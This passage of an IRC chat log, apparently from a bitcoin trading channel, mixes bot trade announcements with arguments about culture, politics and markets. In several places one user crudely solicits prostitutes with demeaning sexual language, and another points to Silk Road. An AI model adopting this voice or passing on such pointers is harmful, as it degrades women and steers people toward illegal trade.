claimed. May 12 23:05:29 but in fact it works as an excuse for not working. May 12 23:05:35 different story May 12 23:05:47 must be evaluated on a case by case basis May 12 23:05:52 nope. May 12 23:05:57 noboduy's business on a case by case basis. May 12 23:06:06 it can only be evaluated on a statistical basis. May 12 23:06:10 haha May 12 23:06:18 well statistically people are lazy and dumb May 12 23:06:23 exactly. May 12 23:07:48 but we *can* evaluate their claims without dipping into ad-hominems May 12 23:08:02 but I don't care! May 12 23:08:10 what do you mean ? May 12 23:08:16 because the world is constructed of power structures that were here before you and I and will be here after you and i May 12 23:08:18 some are born into power May 12 23:08:23 some fight their way to it May 12 23:08:24 ;;calc 8.2 / 101.14 May 12 23:08:25 0.0810757366027 May 12 23:08:27 and most are trampled under foot May 12 23:08:35 benkay and the problem with this is ? May 12 23:08:39 none! May 12 23:08:50 ok then i'm not sure what we're arguing anymore lol May 12 23:08:58 I didn't think we were arguing May 12 23:09:02 i'm just complaining about liberals May 12 23:09:23 well... they are kinda fun tbh. May 12 23:09:36 there's this fallacious expectation that liberal and innovation go together May 12 23:09:39 once they start exposing their kinks May 12 23:09:41 and so therefore they expect bitcoin to be friendly. May 12 23:10:00 best internet comedy setup in the history of comedy May 12 23:11:17 [BTCTC] [COGNITIVE] 1 @ 0.184898 BTC [+] May 12 23:11:40 [BTCTC] [ASICMINER-PT] 1 @ 1.49999 BTC [+] May 12 23:11:50 except that it consumes bandwidth that should go towards building shit May 12 23:12:05 not that anyone cares what the kid thinks May 12 23:12:33 [BTCTC] [PAJKA.BOND] 1 @ 0.109 BTC [-] May 12 23:12:55 jurov: watching PR's posts alone will be gold. thanks for the link/suggestion :) May 12 23:17:13 culture, benkay. it's a waste from a strict civilisational pov May 12 23:17:26 nevertheless, the content of books endures longer than the shape of buildings. May 12 23:17:58 nice, ok now it is working correctly, as far as validating inputs May 12 23:18:02 [HAVELOCK] [ASICM] 39 @ 0.01492999 = 0.5823 BTC [+] May 12 23:18:03 [HAVELOCK] [ASICM] 1 @ 0.01492999 BTC [+] May 12 23:21:28 what's the strict civilizational pov? May 12 23:21:33 [BTCTC] [PAJKA.BOND] 150 @ 0.105 = 15.75 BTC [-] May 12 23:21:52 itams. May 12 23:21:57 [BTCTC] [PAJKA.BOND] 2 @ 0.1085 = 0.217 BTC [+] May 12 23:21:57 productivity. tons of steel per capital May 12 23:22:02 [BTCTC] [PAJKA.BOND] 1 @ 0.107999 BTC [-] May 12 23:22:06 oh mircea_popescu btw, pump and dump doesnt always happen by the people who own the company May 12 23:22:16 spammers just find a penny stock and promote it May 12 23:22:27 taub_ this is true, but still... May 12 23:22:28 would be too obvious if they owned it May 12 23:22:42 there;s most oftenly SOME relation. May 12 23:24:20 mircea_popescu zero consession to hedonics? May 12 23:24:26 concession* May 12 23:24:46 except that it consumes bandwidth that should go towards building shit << May 12 23:24:55 hurr durr May 12 23:24:59 but i've spent so much time building shit May 12 23:25:04 and now i want to experience some fun May 12 23:25:15 if no hedonics exist, i'm basically limited to finding new holes for my dick May 12 23:25:23 which, great, but there's more to life May 12 23:25:57 I don't need immersive 3d environments or whatever May 12 23:26:02 right. May 12 23:26:12 there's a balance there, right? May 12 23:26:34 we want to encourage enough hedonic development to inspire people to take over the world so they can experience crazy fun stuff May 12 23:26:46 but also keep it expensive enough that it's actually a treat May 12 23:27:52 I don't really know where I'm going with this, other than there's gotta be a coupling factor between how much energy to put into plays and books and how much to put into building useful shit. May 12 23:28:44 i guess so. May 12 23:29:34 [BTCTC] [PAJKA.BOND] 1 @ 0.1089 BTC [+] May 12 23:29:55 huh May 12 23:30:17 but because plays are easy to write relative to building a business, and the fame rewards are so outsize, that would explain the misallocation May 12 23:30:24 *might* explain the misallocation. May 12 23:30:45 this is not true. May 12 23:30:54 billions of businesses have been built, a good play has not been written May 12 23:31:08 [BTCTC] [COGNITIVE] 3 @ 0.184868 = 0.5546 BTC [-] May 12 23:31:19 all plays are bad? May 12 23:31:22 [BTCTC] [GSDPT] 1 @ 0.00304 BTC [+] May 12 23:31:25 just because the us has finally given up after two cventuries of trying to build a culture May 12 23:31:29 does not mean "it's easy" May 12 23:31:32 quite the opposite. May 12 23:31:42 oh oh May 12 23:31:48 sorry, let me rephrase May 12 23:31:52 the entire population of the united states has not yet produced a pasible play. May 12 23:31:58 sure, sure May 12 23:32:02 meanwhile it has built some decent businesses. May 12 23:32:11 (tho i guess cat on a hot tin roof may make a claim there) May 12 23:32:24 it seems like someone is trying to keep the prices constant atm May 12 23:32:37 but they produce cultural things they themselves enjoy, and the fame that accrues to the individuals involved is a draw for the other "playwrights" May 12 23:33:02 you often see big walls appearing when prices move too much and they disappear suddenly May 12 23:33:06 and what I meant by 'writing a play is easy' is literally that putting words on paper is a trivial thing for a monkey who's been taught english to accomplish. May 12 23:33:24 b0n1 funny how that works huh. May 12 23:33:38 benkay words on paper doth not a play make. May 12 23:34:04 come on man, don't deliberately misunderstand me May 12 23:34:14 and for that matter the fact that some guy walks on two legs doth not a human make, either. May 12 23:34:22 some of those tomes become popular by no virtue of their writers May 12 23:34:23 nono! it's an important point. May 12 23:34:23 benkay i seem to "deliberately misunderstand" too... May 12 23:34:23 yaeh mircea_popescu its a bit sad because it shows how strong manipulative the market is May 12 23:34:38 i'm not claiming those works are any good May 12 23:34:40 b0n1 not really. it just shows how "speculation" doesn't work in btc. May 12 23:34:43 but that they are successful by some metric May 12 23:34:57 also recommended reading for you : http://trilema.com/2013/people-bitcoin-is-not-worth-100-dollars-per-stop-buying/ May 12 23:34:59 and therefore attract a huge amount of what could otherwise be productive energy May 12 23:35:11 do they ? May 12 23:35:49 rly, memes distract productive energy? May 12 23:36:14 I dont understand why the big influencers are not trying to push the prices and lock them afterwards May 12 23:36:15 [MPEX] [S.MPOE] 4321 @ 0.00070841 = 3.061 BTC [+] May 12 23:36:16 [MPEX] [S.MPOE] 9131 @ 0.00070809 = 6.4656 BTC [-] May 12 23:36:16 what are you two objecting to? that the energy could be deployed in a useful way? or that any energy is diverted? May 12 23:36:17 [MPEX] [S.MPOE] 5548 @ 0.00070765 = 3.926 BTC [-] May 12 23:36:34 benkay i object to the entire construction. May 12 23:36:41 it sounds to me like "if you shat less you could cum more" May 12 23:36:42 why do they lock it so low? May 12 23:37:06 if fewer monkeys wasted their lives writing crap they could staff factories May 12 23:37:07 mircea_popescu do you have evidence that shows otherwise May 12 23:37:35 benkay, whole eastern european communism was anti-hedonistic and purported to maximize usage of "productive energy" May 12 23:37:38 kakobrekla lol notrly May 12 23:37:43 we see how i ended May 12 23:37:58 indeed, jurov has a point there. May 12 23:38:26 b0n1 to punish noobs who think bitcoin is a get rich scheme and they can ride the bandwagon. May 12 23:38:53 i thought easter european communism was a front to enrich a small number of people May 12 23:39:02 all of the propaganda was just...propaganda. May 12 23:39:07 benkay, that was how it ended May 12 23:39:22 but in 50-60's everyone actually believed it May 12 23:39:33 that's terrifying. May 12 23:39:47 every instance of communism starts out as an attempt to implement the intellectualy bankrupt "ideas" of the libertards May 12 23:40:00 and ends up in a horror, which then the libertarda claim is distinct from "their ideal" May 12 23:40:04 and so they want to try it again May 12 23:40:07 mircea_popescu, that doesnt make sence. The global players would profit most from pushing prices May 12 23:40:10 this is the essence of TARD in libertard. May 12 23:40:26 b0n1 the fact that you don't understand it doesn't mean it doesn't make senSe. May 12 23:40:51 and conceivably if you were in a position to know what rich people benefited most from, you'd be rich yourself already May 12 23:41:07 except that this kind of communism was very far from "liber"... it was conceived to go through dictatorship of proletariate May 12 23:41:29 on the premise that if workers rule, economyu will soar May 12 23:41:38 and society will solve all its problems May 12 23:41:41 this is the idea of the liberal left, yes. May 12 23:41:53 that "privilege" is bad and that the more people "rule" the better. May 12 23:42:18 except all this does is replace the proper elite with a failed elite. May 12 23:42:29 yes May 12 23:43:34 this conversation puts the past half-century of american history in interesting perspective May 12 23:43:53 deprive the proles of education, so that they demand less entertainment, so that the true elites can work them harder for less pay May 12 23:44:05 perhaps May 12 23:44:15 [BTCTC] [GSDPT] 2 @ 0.00304 = 0.0061 BTC [+] May 12 23:44:34 certainly the smartphone is a marvel of cheap token replacement of circus. May 12 23:44:42 it never was this cost effective. May 12 23:44:54 well May 12 23:45:02 they take on the debt for the toys themselves May 12 23:45:05 it's hidden very well May 12 23:45:46 most jobs will issue you one May 12 23:45:48 i'm going to steal that idea, mircea_popescu May 12 23:46:06 go ahead. May 12 23:46:12 most americans don't have jobs that would issue them anything May 12 23:47:01 true, which is why i phrased it the way i did :D May 12 23:47:37 so...anyone know how to find really accurate gps info? May 12 23:47:45 i want to find a parks boundaries... May 12 23:47:48 as a simple heuristic, the line between welfare and employment can be drawn right there : does it come with free smartphone ? May 12 23:47:55 if not, disguised unemployment. May 12 23:48:55 mjr___ wouldn't it be better to solve a softer problem ? ie, take a guess of the park size and do x radius from center ? May 12 23:48:59 What ever happened to Bowjob? Is he in the military or something May 12 23:49:05 hahahaha May 12 23:49:06 not like including people on the outskirts is a mission failure May 12 23:49:36 otherwise the edge problem is a really tough one. May 12 23:50:01 mjr___ i heard they have cities built by grid in murica May 12 23:50:02 mircea_popescu: yeah thats another way to do it May 12 23:50:08 jurov: they do! May 12 23:50:09 to dispose of exactly such problems May 12 23:50:19 which is why i'm really curious why i can't find the exact boundaries of the park May 12 23:50:20 mircea_popescu: I didn't get a free smartphone :( May 12 23:50:25 [BTCTC] [ASICMINER-PT] 2 @ 1.49999 = 3 BTC [+] May 12 23:50:34 i was going to add in some fuzziness to the edges anyway May 12 23:50:34 copumpkin so now you know. May 12 23:50:39 also xmas. May 12 23:50:40 [BTCTC] [ASICMINER-PT] 11 @ 1.49999 = 16.4999 BTC [+] May 12 23:50:50 I need to advance my career past "janitor" May 12 23:51:01 [BTCTC] [ASICMINER-PT] 1 @ 1.5 BTC [+] May 12 23:51:02 like chief janitor or something May 12 23:51:22 [BTCTC] [ASICMINER-PT] 10 @ 1.5 = 15 BTC [+] May 12 23:51:26 Chef Janitor has a nice ring to it. Cook and Clean. May 12 23:51:45 CJO May 12 23:51:49 now you u has startup title May 12 23:51:51 chief custodial officer May 12 23:51:55 ah well, some progress made May 12 23:52:06 I'll petition for a raise tomorrow May 12 23:52:07 ;;seen bowjob May 12 23:52:08 bowjob was last seen in #bitcoin-assets 6 weeks, 1 day, 16 hours, 1 minute, and 0 seconds ago: https://bitcointalk.org/index.php?topic=161230.msg1703283#new May 12 23:52:09 once user accounts work correctly it'll be functional enough to use tomorrow May 12 23:52:13 you have to go through Senior Janitor first, are you there alreadY? May 12 23:52:14 so i have 24 hours lol May 12 23:52:22 don't stop get it get it mjr May 12 23:52:28 jurov: nope :( May 12 23:52:40 "There's always something stewing in the toilet at Chef Janitor's Restaurant" May 12 23:52:41 copumpkin http://upload.wikimedia.org/wikipedia/commons/6/60/Josef_Brodsky.jpg May 12 23:53:59 [BTCTC] [ASICMINER-PT] 6 @ 1.5 = 9 BTC [+] May 12 23:54:19 mircea_popescu: how'd you find a pic of me? May 12 23:54:43 i have people working for me May 12 23:55:16 incidentally this was fred wilson's q, "how come you know so much about me". teh lol. May 12 23:55:51 [BTCTC] [ASICMINER-PT] 2 @ 1.5 = 3 BTC [+] May 12 23:56:36 haha his slovak wikipedia entry is much more succinct and funny May 12 23:56:57 whats going to happen when the difficulty skyrockets from the avalon chips May 12 23:57:23 KRS1, if you fail to invest into difficulty futures... then pretty nothing May 12 23:57:40 mjr_ you gotta stick the footer text in some different frontend bag May 12 23:57:46 orders are looming over it May 12 23:57:51 er May 12 23:57:53 bids and asks May 12 23:57:59 [BTCTC] [TAT.ASICMINER] 28 @ 0.01489 = 0.4169 BTC [+] May 12 23:59:24 HAH didnt even know there were futures for that May 12 23:59:27 [BTCTC] [TAT.ASICMINER] 2 @ 0.014939 = 0.0299 BTC [+] May 12 23:59:39 [BTCTC] [TAT.ASICMINER] 73 @ 0.014939 = 1.0905 BTC [+] May 12 23:59:44 you dont mean calls/puts do u? May 12 23:59:53 or binary options May 13 00:00:18 KRS1: this for example https://bitcointalk.org/index.php?topic=140608.0 May 13 00:00:26 and X.IDIFF.* on MPEx May 13 00:03:16 where do i find prostitutes? May 13 00:03:32 [BTCTC] [ASICMINER-PT] 2 @ 1.5 = 3 BTC [+] May 13 00:04:48 will_smith2: male or female? May 13 00:05:39 female May 13 00:05:59 i can go to bucharest or somewhere like this May 13 00:05:59 for bitches May 13 00:07:25 then go to bucharest, problem solved. May 13 00:08:05 can someone make high quality bitch for my penis May 13 00:08:14 ... May 13 00:08:46 will_smith2: for that prolly ask hardware nerds in #bitcoin-mining instead May 13 00:09:24 mircea polpesurt can you find me a bitch May 13 00:09:54 what's a polpesurt May 13 00:10:01 [HAVELOCK] [SDICE] 1 @ 0.2994 BTC [+] May 13 00:10:03 sorry i do your name wrong May 13 00:10:05 sounds dirty May 13 00:10:27 sounds better as popelsurt May 13 00:10:38 poppysuit? May 13 00:10:55 has a nice heroin ring to it... May 13 00:11:06 please, i hear you are a bitch master. I want some nice quality one May 13 00:11:37 will_smith2, but he asks 30BTC admission. May 13 00:12:03 no this is too much, even angel jolie has not vagina worth this much May 13 00:12:12 poppysuit hmm May 13 00:12:13 you'll need some passthrough then May 13 00:12:14 i want good value for money bitches May 13 00:12:32 we all want good value for money bitches May 13 00:12:37 yes bitches May 13 00:12:40 we can make a secret password please May 13 00:12:41 ok May 13 00:12:48 secret password ballbag287 May 13 00:12:50 ? May 13 00:12:54 secret password instead purpleskew May 13 00:12:55 you need to bring me a shrubbery. May 13 00:12:56 and then i get nice value May 13 00:13:06 no problem May 13 00:13:12 i will find free one on street for you May 13 00:13:19 [BTCTC] [ASICMINER-PT] 1 @ 1.5 BTC [+] May 13 00:13:27 btw what are you smoking? i wanna some May 13 00:13:38 not shrubbery May 13 00:13:46 some can have toxic smoke mates May 13 00:13:48 but raspberry May 13 00:14:06 actually i got myselfd a ribizsli bush May 13 00:14:06 so listen mirceal m8s, do you fix me some bitches? secret password May 13 00:14:15 whatever you call it in english mmmm May 13 00:14:18 black currants May 13 00:14:19 ladles and jellyspoons, bitcoin-assets on a sunday. May 13 00:14:35 black currants are nice May 13 00:14:40 you can make some nice pie with it May 13 00:14:45 i live england now May 13 00:14:48 bitches make pie for my good value money May 13 00:14:59 doesn't make sense m8s May 13 00:15:08 so where do i get prostitutes May 13 00:15:15 #bitcoin-trollbox May 13 00:15:18 there May 13 00:15:18 i can pay no more than £3000 english May 13 00:15:25 but i want cheaper preferance May 13 00:15:36 well guys May 13 00:15:37 but still high quality like keri sable but nice face May 13 00:15:40 have a good day\ May 13 00:15:48 this isn't even trollbox material... rather #bitcoin-sphincter May 13 00:15:48 hopefully tomorrow the site will be working well May 13 00:15:52 LOL May 13 00:15:59 i think my site needs a trollbox May 13 00:16:09 (i will be adding chat features into it) May 13 00:16:12 everyone needs a trollbox May 13 00:16:14 ,er May 13 00:16:16 even trollbox May 13 00:16:19 [BTCTC] [ASICMINER-PT] 2 @ 1.5 = 3 BTC [+] May 13 00:16:23 try the silkroad May 13 00:16:27 i met some bitch from reddit, but her boyfriend was there all the time, and she was boring May 13 00:16:31 she just lie there May 13 00:16:37 and it costs almost £1500 May 13 00:16:38 http://www.google.com/search?q=keri+sable May 13 00:16:43 wtf is this quality nao ?! May 13 00:16:52 like her, but nice face May 13 00:17:02 Yeh seriously though if I come to Romania I can find hawt womens to be with me for good price? There are beautiful womens in there. May 13 00:17:02 she should be easy to sex May 13 00:17:59 anyway May 13 00:18:21 mircea_popescu: i think it may be harder to define a circular radius than it would be a rectangle May 13 00:18:25 so i am ready May 13 00:18:46 i asked people on craigslist and reddit May 13 00:18:50 [BTCTC] [ASICMINER-PT] 5 @ 1.5 = 7.5 BTC [+] May 13 00:18:52 but it is hard to buy one May 13 00:18:52 mjr___ so do arbitrary rectangle May 13 00:18:57 which technically is a sort of a circle :D May 13 00:19:43 [BTCTC] [ASICMINER-PT] 1 @ 1.5 BTC [+] May 13 00:19:53 listen i dunno about shapes May 13 00:19:58 but please, vagina. May 13 00:20:08 [BTCTC] [ASICMINER-PT] 1 @ 1.5 BTC [+] May 13 00:20:10 mircea_popescu, lol yes, i guess i will do that May 13 00:20:20 i was thinking of empirical measurements May 13 00:20:23 which could be fun May 13 00:21:02 [HAVELOCK] [VTX] 1 @ 0.426 BTC [+] May 13 00:21:03 [HAVELOCK] [VTX] 3 @ 0.42550008 = 1.2765 BTC [-] May 13 00:21:21 will_smith2 http://polimedia.us/dtng/c/ try there. May 13 00:22:01 [HAVELOCK] [VTX] 1 @ 0.42550008 BTC [-] May 13 00:22:02 [HAVELOCK] [VTX] 6 @ 0.4255 = 2.553 BTC [-] May 13 00:23:25 i go there May 13 00:23:32 but i do not like them May 13 00:24:49 has anyone been onto reddit bitcoin for girls? i met one in england from l4r, but it wasn't good May 13 00:25:07 the last 10 days on altcoinland : http://i.imgur.com/IHm264K.jpg May 13 00:25:18 nice chart May 13 00:27:20 thx May 13 00:28:37 scary news from reptilia: https://bitcointalk.org/index.php?topic=174620.msg2119544#msg2119544 May 13 00:28:54 is he comming to the conf? May 13 00:29:30 aha May 13 00:29:38 well at least ppl learnd to quote May 13 00:33:01 Sorry that the conference was busted big time. I took all precautions available to me, but considerable force was used against me. If anyone related to the matters currently unfolding is threatened with physical harm, I am able to cede the control of a necessary number of bitcoins to redeem him/her. May 13 00:33:02 [HAVELOCK] [HIM] 1 @ 2.3499 BTC [-] May 13 00:33:03 waitwhat ? May 13 00:33:35 [BTCTC] [ASICMINER-PT] 1 @ 1.51 BTC [+] May 13 00:34:14 According to the Elliot Wave Principle, does anyone agree that we may be between wave 3 and 5 of the second cycle? May 13 00:35:21 [BTCTC] [ASICMINER-PT] 1 @ 1.51 BTC [+] May 13 00:35:56 found interesting tidbit on reptilia: http://translate.google.com/translate?hl=sk&sl=fi&tl=en&u=http%3A%2F%2Fwww.image.fi%2Fartikkelit%2Foikeamieliset May 13 00:36:21 skip to last third, but whole stuff is interesting May 13 00:36:40 jurov summary ? May 13 00:36:49 "It is not my task to assess where silver has been obtained," Pietilä says. May 13 00:37:14 that what happend when you post picture with a box of cash, tell ppl you buy&sell gold, silver bitcoin in a hotel room May 13 00:38:21 plus that he found his identity in some foodist hipster circle May 13 00:38:28 i dunno what happen but if it's not that bad, is a good warning May 13 00:38:54 error4733 but they were going to weigh the bills ? May 13 00:39:41 [MPEX] [S.MPOE] 2336 @ 0.00070797 = 1.6538 BTC [+] May 13 00:39:44 [MPEX] [S.MPOE] 6864 @ 0.00070765 = 4.8573 BTC [-] May 13 00:40:39 [BTCTC] [TAT.ASICMINER] 2 @ 0.014939 = 0.0299 BTC [+] May 13 00:41:43 jurov: sounds like e-gold kind of guy to me May 13 00:41:52 [BTCTC] [BITVPS] 184 @ 0.000967 = 0.1779 BTC [-] May 13 00:41:52 high hopes, fake p metal reserves May 13 00:41:59 [BTCTC] [ASICMINER-PT] 10 @ 1.51 = 15.1 BTC [+] May 13 00:42:43 [BTCTC] [TAT.ASICMINER] 15 @ 0.01489 = 0.2234 BTC [-] May 13 00:42:47 [BTCTC] [TAT.ASICMINER] 28 @ 0.01488 = 0.4166 BTC [-] May 13 00:42:50 [BTCTC] [TAT.ASICMINER] 10 @ 0.014501 = 0.145 BTC [-] May 13 00:42:55 [BTCTC] [TAT.ASICMINER] 5 @ 0.0145 = 0.0725 BTC [-] May 13 00:43:09 [BTCTC] [TAT.ASICMINER] 15 @ 0.01444 = 0.2166 BTC [-] May 13 00:43:11 [BTCTC] [ASICMINER-PT] 1 @ 1.5099 BTC [-] May 13 00:43:12 loldrama May 13 00:43:16 [BTCTC] [TAT.ASICMINER] 7 @ 0.014439 = 0.1011 BTC [-] May 13 00:43:18 [BTCTC] [ASICMINER-PT] 9 @ 1.51 = 13.59 BTC [+] May 13 00:43:41 yes, you can see by the price, a buck up. May 13 00:43:51 [BTCTC] [TAT.ASICMINER] 5 @ 0.014439 = 0.0722 BTC [-] May 13 00:43:58 [BTCTC] [TAT.ASICMINER] 10 @ 0.014939 = 0.1494 BTC [+] May 13 00:44:17 [BTCTC] [ASICMINER-PT] 1 @ 1.5099 BTC [-] May 13 00:45:01 [BTCTC] [ASICMINER-PT] 1 @ 1.51 BTC [+] May 13 00:45:02 [HAVELOCK] [VTX] 1 @ 0.426 BTC [+] May 13 00:45:27 [BTCTC] [ASICMINER-PT] 1 @ 1.51 BTC [+] May 13 00:45:59 [BTCTC] [ASICMINER-PT] 1 @ 1.51 BTC [+] May 13 00:46:05 [BTCTC] [ASICMINER-PT] 15 @ 1.5 = 22.5 BTC [-] May 13 00:46:11 [BTCTC] [ASICMINER-PT] 1 @ 1.4952 BTC [-] May 13 00:46:25 [BTCTC] [ASICMINER-PT] 7 @ 1.49501 = 10.4651 BTC [-] May 13 00:46:35 great find jurov May 13 00:46:40 so much crazy in dat May 13 00:46:49 [BTCTC] [TAT.ASICMINER] 2 @ 0.014939 = 0.0299 BTC [+] May 13 00:47:14 [BTCTC] [ASICMINER-PT] 1 @ 1.51 BTC [+] May 13 00:53:01 [HAVELOCK] [ASICM] 140 @ 0.01491999 = 2.0888 BTC [-] May 13 00:53:02 [HAVELOCK] [ASICM] 360 @ 0.01492 = 5.3712 BTC [+] May 13 00:53:47 [BTCTC] [ASICMINER-PT] 1 @ 1.51 BTC [+] May 13 00:55:38 high hopes, fake p metal reserves << kinda. May 13 00:56:43 moar lulz, allow me : May 13 00:56:44 https://bitcointalk.org/index.php?topic=186043.msg2124665#msg2124665 May 13 00:56:49 https://bitcointalk.org/index.php?topic=197853.msg2124633#msg2124633 May 13 00:57:04 [BTCTC] [ASICMINER-PT] 2 @ 1.51 = 3.02 BTC [+] May 13 00:58:45 [BTCTC] [TAT.ASICMINER] 90 @ 0.014939 = 1.3445 BTC [+] May 13 00:59:13 she's getting better May 13 01:03:24 Since the stern art of poetry calls for words, I, morose, deaf, and balding ambassador of a more or less insignificant nation that's stuck in this super power, wishing to spare my old brain, put on clothes – all by myself – and head for the main street: for the evening paper. May 13 01:03:43 pity the russian masters aren't more read in the us. May 13 01:04:41 [BTCTC] [ASICMINER-PT] 1 @ 1.51 BTC [+] May 13 01:06:22 [BTCTC] [TAT.ASICMINER] 73 @ 0.014939 = 1.0905 BTC [+] May 13 01:06:28 Would anyone know why chanserv took over #bitcoin-anal May 13 01:06:35 [BTCTC] [TAT.ASICMINER] 9 @ 0.014939 = 0.1345 BTC [+] May 13 01:06:47 [BTCTC] [TAT.ASICMINER] 50 @ 0.014987 = 0.7494 BTC [+] May 13 01:06:53 [BTCTC] [TAT.ASICMINER] 48 @ 0.014988 = 0.7194 BTC [+] May 13 01:07:09 [BTCTC] [TAT.ASICMINER] 3 @ 0.01499 = 0.045 BTC [+] May 13 01:07:24 [BTCTC] [TAT.ASICMINER] 200 @ 0.01499 = 2.998 BTC [+] May 13 01:07:33 [BTCTC] [TAT.ASICMINER] 10 @ 0.014999 = 0.15 BTC [+] May 13 01:07:39 [BTCTC] [TAT.ASICMINER] 1 @ 0.015 BTC [+] May 13 01:07:57 [BTCTC] [TAT.ASICMINER] 2 @ 0.015 = 0.03 BTC [+] May 13 01:08:16 [BTCTC] [TAT.ASICMINER] 10 @ 0.015 = 0.15 BTC [+] May 13 01:08:24 [BTCTC] [TAT.ASICMINER] 10 @ 0.015 = 0.15 BTC [+] May 13 01:09:46 [BTCTC] [ASICMINER-PT] 13 @ 1.51 = 19.63 BTC [+] May 13 01:11:41 [BTCTC] [COGNITIVE] 1 @ 0.161 BTC [-] May 13 01:12:05 [BTCTC] [COGNITIVE] 1 @ 0.16 BTC [-] May 13 01:12:09 [BTCTC] [COGNITIVE] 2 @ 0.157 = 0.314 BTC [-] May 13 01:12:11 [BTCTC] [ASICMINER-PT] 2 @ 1.51 = 3.02 BTC [+] May 13 01:12:17 [BTCTC] [COGNITIVE] 2 @ 0.15 = 0.3 BTC [-] May 13 01:15:24 [BTCTC] [TAT.ASICMINER] 32 @ 0.01512 = 0.4838 BTC [+] May 13 01:16:01 [HAVELOCK] [ASICM] 87 @ 0.01492 = 1.298 BTC [+] May 13 01:19:40 [BTCTC] [ASICMINER-PT] 7 @ 1.51 = 10.57 BTC [+] May 13 01:22:16 [BTCTC] [ASICMINER-PT] 1 @ 1.5389 BTC [+] May 13 01:23:17 [BTCTC] [ASICMINER-PT] 1 @ 1.5389 BTC [+] May 13 01:24:35 [BTCTC] [ASICMINER-PT] 1 @ 1.539 BTC [+] May 13 01:24:40 [BTCTC] [ASICMINER-PT] 1 @ 1.54 BTC [+] May 13 01:26:42 [BTCTC] [ASICMINER-PT] 3 @ 1.54 = 4.62 BTC [+] May 13 01:26:49 [BTCTC] [BITVPS] 5 @ 0.000967 = 0.0048 BTC [-] May 13 01:28:12 [BTCTC] [ASICMINER-PT] 1 @ 1.5389 BTC [-] May 13 01:31:57 [BTCTC] [ASICMINER-PT] 3 @ 1.5 = 4.5 BTC [-] May 13 01:32:17 [BTCTC] [ASICMINER-PT] 6 @ 1.5 = 9 BTC [-] May 13 01:32:33 [BTCTC] [TAT.ASICMINER] 2 @ 0.01505 = 0.0301 BTC [-] May 13 01:33:02 [HAVELOCK] [ASICM] 980 @ 0.01471 = 14.4158 BTC [-] May 13 01:33:03 [HAVELOCK] [ASICM] 20 @ 0.01470001 = 0.294 BTC [-] May 13 01:35:40 [BTCTC] [TAT.ASICMINER] 2 @ 0.01505 = 0.0301 BTC [-] May 13 01:36:48 hehe >> https://bitcointalk.org/index.php?topic=149458.msg2124345#msg2124345 May 13 01:37:10 [BTCTC] [ASICMINER-PT] 4 @ 1.5399 = 6.1596 BTC [+] May 13 01:37:26 [BTCTC] [ASICMINER-PT] 2 @ 1.54 = 3.08 BTC [+] May 13 01:39:23 [MPEX] [S.MPOE] 3469 @ 0.00070765 = 2.4548 BTC [-] May 13 01:39:25 [MPEX] [S.MPOE] 431 @ 0.00070666 = 0.3046 BTC [-] May 13 01:44:38 [BTCTC] [ASICMINER-PT] 5 @ 1.5395 = 7.6975 BTC [-] May 13 01:46:35 [BTCTC] [ASICMINER-PT] 1 @ 1.54 BTC [+] May 13 01:47:38 [BTCTC] [ASICMINER-PT] 5 @ 1.4 = 7 BTC [-] May 13 01:47:46 [BTCTC] [ASICMINER-PT] 1 @ 1.54 BTC [+] May 13 01:48:04 come to papa May 13 01:48:43 [BTCTC] [ASICMINER-PT] 1 @ 1.54 BTC [+] May 13 01:56:07 [BTCTC] [ASICMINER-PT] 1 @ 1.510001 BTC [-] May 13 01:56:16 [BTCTC] [ASICMINER-PT] 1 @ 1.51 BTC [-] May 13 01:56:39 [BTCTC] [ASICMINER-PT] 1 @ 1.501 BTC [-] May 13 01:56:54 [BTCTC] [ASICMINER-PT] 4 @ 1.54 = 6.16 BTC [+] May 13 01:57:05 [BTCTC] [BITVPS] 50 @ 0.000968 = 0.0484 BTC [+] May 13 01:58:18 1.5 wow May 13 01:58:45 still selling shares Uglux? May 13 02:02:01 [HAVELOCK] [HIM] 1 @ 2.375 BTC [+] May 13 02:02:03 [HAVELOCK] [HIM] 2 @ 2.42 = 4.84 BTC [+] May 13 02:02:04 [HAVELOCK] [HIM] 1 @ 2.48 BTC [+] May 13 02:02:56 [BTCTC] [TAT.ASICMINER] 1 @ 0.01505 BTC [-] May 13 02:03:01 [HAVELOCK] [SDICE] 1 @ 0.2994 BTC [+] May 13 02:07:42 [BTCTC] [TAT.ASICMINER] 11 @ 0.01505 = 0.1656 BTC [-] May 13 02:11:16 130 orders queued up for AM blades that aren't for sale May 13 02:11:25 I guess theyre gonna pm Friedcat May 13 02:11:32 to see if he can fill the orders May 13 02:11:47 he should sat, sure, for an extra 10btc ea May 13 02:11:50 say* May 13 02:12:45 these people are just asking for it now... https://bitcointalk.org/index.php?topic=99497.msg2126008#msg2126008 May 13 02:21:37 [BTCTC] [ASICMINER-PT] 1 @ 1.500001 BTC [-] May 13 02:22:25 lol May 13 02:27:41 [BTCTC] [ASICMINER-PT] 1 @ 1.500001 BTC [-] May 13 02:31:55 [BTCTC] [TAT.ASICMINER] 1 @ 0.01505 BTC [-] May 13 02:37:32 [MPEX] [S.MPOE] 7091 @ 0.00070797 = 5.0202 BTC [+] May 13 02:43:53 [BTCTC] [ASICMINER-PT] 1 @ 1.549399 BTC [+] May 13 02:43:57 [BTCTC] [ASICMINER-PT] 3 @ 1.549399 = 4.6482 BTC [+] May 13 02:44:11 [BTCTC] [ASICMINER-PT] 2 @ 1.5 = 3 BTC [-] May 13 02:45:13 [BTCTC] [ASICMINER-PT] 2 @ 1.484 = 2.968 BTC [-] May 13 02:46:02 [BTCTC] [ASICMINER-PT] 1 @ 1.481 BTC [-] May 13 02:46:16 [BTCTC] [ASICMINER-PT] 1 @ 1.481 BTC [-] May 13 02:47:58 [BTCTC] [ASICMINER-PT] 1 @ 1.480234 BTC [-] May 13 02:48:14 [BTCTC] [ASICMINER-PT] 1 @ 1.4801 BTC [-] May 13 02:48:44 [BTCTC] [ASICMINER-PT] 1 @ 1.478003 BTC [-] May 13 02:48:57 [BTCTC] [ASICMINER-PT] 6 @ 1.469701 = 8.8182 BTC [-] May 13 02:49:23 ;;seen smickles May 13 02:49:23 smickles was last seen in #bitcoin-assets 6 weeks, 0 days, 7 hours, 52 minutes, and 0 seconds ago: ;;seen smickles May 13 02:49:30 ;;seen mircea_popescu May 13 02:49:31 mircea_popescu was last seen in #bitcoin-assets 27 minutes and 5 seconds ago: lol May 13 02:49:38 mr. popescu May 13 02:49:52 ye ? May 13 02:51:04 [BTCTC] [ASICMINER-PT] 1 @ 1.469701 BTC [-] May 13 02:51:18 [BTCTC] [ASICMINER-PT] 3 @ 1.4697 = 4.4091 BTC [-] May 13 03:09:32 is smickles dead? May 13 03:16:24 [MPEX] [S.MPOE] 